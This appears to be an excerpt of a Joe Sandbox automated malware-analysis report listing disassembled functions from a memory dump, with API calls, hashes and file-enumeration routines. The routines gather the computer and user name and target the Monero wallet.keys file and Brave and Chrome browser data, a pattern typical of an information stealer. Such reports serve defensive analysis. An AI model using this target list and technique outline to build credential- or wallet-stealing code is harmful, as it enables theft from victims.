                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005F10B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005F10F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: 05a858a21576b4e3d0006691147385f847666fd8fdd858e7160813641588ab6a
                            • Instruction ID: 2fbd1b4d0ea1d0c690b5e823fdd7558e37f48811c3bcc6e8d3adf5a2e5970735
                            • Opcode Fuzzy Hash: 05a858a21576b4e3d0006691147385f847666fd8fdd858e7160813641588ab6a
                            • Instruction Fuzzy Hash: 62F0E971641208BBE71496A89C49FBBB7DCE705715F300848F644E3280D5715F00CA94
                            Function 005F1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 006078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00607910
                              • Part of subcall function 006078E0: RtlAllocateHeap.NTDLL(00000000), ref: 00607917
                              • Part of subcall function 006078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0060792F
                              • Part of subcall function 00607850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005F11B7), ref: 00607880
                              • Part of subcall function 00607850: RtlAllocateHeap.NTDLL(00000000), ref: 00607887
                              • Part of subcall function 00607850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0060789F
                            • ExitProcess.KERNEL32 ref: 005F11C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: 1c1d14a27356a79e4d16850b96e9f88f33c442bf93b758fcebdaf7c21e8775f3
                            • Instruction ID: a2499f1dd95baa59af225f9043965b5ad7e625a26dd25f8bf01c75796d4de268
                            • Opcode Fuzzy Hash: 1c1d14a27356a79e4d16850b96e9f88f33c442bf93b758fcebdaf7c21e8775f3
                            • Instruction Fuzzy Hash: D2E0ECA5A5460956CA4873B0AC0BB2B369D7B54745F040828BA4592582FA29F800856E

                            Non-executed Functions

                            Function 006038B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 006038CC
                            • FindFirstFileA.KERNEL32(?,?), ref: 006038E3
                            • lstrcat.KERNEL32(?,?), ref: 00603935
                            • StrCmpCA.SHLWAPI(?,00610F70), ref: 00603947
                            • StrCmpCA.SHLWAPI(?,00610F74), ref: 0060395D
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00603C67
                            • FindClose.KERNEL32(000000FF), ref: 00603C7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: 5dbf1a800f7712277810fe1261d8a282a8f8db4ae88e93499f36ec97d052e0b3
                            • Instruction ID: 1d125a89ae19e8d50763766b8eec57713cb22d22a215f4c68faa0115c8fe157a
                            • Opcode Fuzzy Hash: 5dbf1a800f7712277810fe1261d8a282a8f8db4ae88e93499f36ec97d052e0b3
                            • Instruction Fuzzy Hash: 94A162B1A402189FDB28DFA4DC85FFA737DBB94301F044588B64D96281EB759B84CF62
                            Function 005FBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • FindFirstFileA.KERNEL32(00000000,?,00610B32,00610B2B,00000000,?,?,?,006113F4,00610B2A), ref: 005FBEF5
                            • StrCmpCA.SHLWAPI(?,006113F8), ref: 005FBF4D
                            • StrCmpCA.SHLWAPI(?,006113FC), ref: 005FBF63
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 005FC7BF
                            • FindClose.KERNEL32(000000FF), ref: 005FC7D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-726946144
                            • Opcode ID: b8097e73686ab1dde6b08aba3cadcfc96af421acc70d0d378aeb904000fb6a72
                            • Instruction ID: 2a5fe819e0c2a02b6c7f618e72d80c44a4fed5548f7fb9550decf9455ac985c5
                            • Opcode Fuzzy Hash: b8097e73686ab1dde6b08aba3cadcfc96af421acc70d0d378aeb904000fb6a72
                            • Instruction Fuzzy Hash: 9A42957195020897CB58FBB0DD96EEF773EAB94340F40856CB906960C1EF349B49CB96
                            Function 00604910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 0060492C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00604943
                            • StrCmpCA.SHLWAPI(?,00610FDC), ref: 00604971
                            • StrCmpCA.SHLWAPI(?,00610FE0), ref: 00604987
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00604B7D
                            • FindClose.KERNEL32(000000FF), ref: 00604B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: 7e696e83b37a71d026832ec6761364f75eb5d4c00ba998a10c708c30fd9b80f5
                            • Instruction ID: dabebe04c0b642b6df42c1ca9feddd2360c78b22438e46f455b4c4cc24f89e6d
                            • Opcode Fuzzy Hash: 7e696e83b37a71d026832ec6761364f75eb5d4c00ba998a10c708c30fd9b80f5
                            • Instruction Fuzzy Hash: 9A6136B1500218ABCB28EBA0DC49FEB737DBB98701F04859CB64996181EF75DB85CF91
                            Function 00604570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00604580
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00604587
                            • wsprintfA.USER32 ref: 006045A6
                            • FindFirstFileA.KERNEL32(?,?), ref: 006045BD
                            • StrCmpCA.SHLWAPI(?,00610FC4), ref: 006045EB
                            • StrCmpCA.SHLWAPI(?,00610FC8), ref: 00604601
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0060468B
                            • FindClose.KERNEL32(000000FF), ref: 006046A0
                            • lstrcat.KERNEL32(?,0140E540), ref: 006046C5
                            • lstrcat.KERNEL32(?,0140CFF8), ref: 006046D8
                            • lstrlen.KERNEL32(?), ref: 006046E5
                            • lstrlen.KERNEL32(?), ref: 006046F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 1096103f201c6971911064898cf5989502c62d928dc579930d4e2ca1c392b893
                            • Instruction ID: fcd18d50e5c990162ff76fc2fbe75f3cff6439675666a45364cb3db188e30808
                            • Opcode Fuzzy Hash: 1096103f201c6971911064898cf5989502c62d928dc579930d4e2ca1c392b893
                            • Instruction Fuzzy Hash: 4B5155B15402189FCB68EB70DC89FEA737DBB98300F404998F68992190EF75DB858F91
                            Function 00603EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 00603EC3
                            • FindFirstFileA.KERNEL32(?,?), ref: 00603EDA
                            • StrCmpCA.SHLWAPI(?,00610FAC), ref: 00603F08
                            • StrCmpCA.SHLWAPI(?,00610FB0), ref: 00603F1E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0060406C
                            • FindClose.KERNEL32(000000FF), ref: 00604081
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: 68c654e0ecde6b541ecada8901756362059b7c945c5f19a06f70f2dd08cb27a3
                            • Instruction ID: f886ace87de43d57e5994c5592b669bab4e3a6abda0fba20edc7b0c41334ff2e
                            • Opcode Fuzzy Hash: 68c654e0ecde6b541ecada8901756362059b7c945c5f19a06f70f2dd08cb27a3
                            • Instruction Fuzzy Hash: 5D5168B1900218AFCB28FBB4DC85EEA737DBB84300F00459CB79996180DB75DB858F55
                            Function 005FED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 005FED3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 005FED55
                            • StrCmpCA.SHLWAPI(?,00611538), ref: 005FEDAB
                            • StrCmpCA.SHLWAPI(?,0061153C), ref: 005FEDC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 005FF2AE
                            • FindClose.KERNEL32(000000FF), ref: 005FF2C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: 0b10e7f9b96e4bc357b10534b96351b9e882da941eb535f48a68b3e368362d6a
                            • Instruction ID: 16571f8da0ade0db7c7ff2eebc65e292b01d18aa7469ec27d0be78e529588f99
                            • Opcode Fuzzy Hash: 0b10e7f9b96e4bc357b10534b96351b9e882da941eb535f48a68b3e368362d6a
                            • Instruction Fuzzy Hash: 3BE1C4719512189AEB98FBA0DC52EEF733AAF54340F40459DB506620D2EF306F8ACF55
                            Function 009B66B6 Relevance: 16.7, Strings: 12, Instructions: 1651COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $-$)Nsr$?U}N$Ai~~$Qgog$Uh'}$b@z$d~*w$k3l$n3l${8[_$~{
                            • API String ID: 0-4286980269
                            • Opcode ID: d882fba17a01a4495af7338beaf4b00a254090b93335bb2708cfacfc5b9eb441
                            • Instruction ID: 02b7c932c8ecc84dcf12c1ed530e71011195cff57b0a45f9d0dd7eba2d1d5fab
                            • Opcode Fuzzy Hash: d882fba17a01a4495af7338beaf4b00a254090b93335bb2708cfacfc5b9eb441
                            • Instruction Fuzzy Hash: 84B202F360C2009FE3046E29EC8567AFBE9EF94320F164A3DE6C587744EA7598058697
                            Function 005FF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006115B8,00610D96), ref: 005FF71E
                            • StrCmpCA.SHLWAPI(?,006115BC), ref: 005FF76F
                            • StrCmpCA.SHLWAPI(?,006115C0), ref: 005FF785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 005FFAB1
                            • FindClose.KERNEL32(000000FF), ref: 005FFAC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
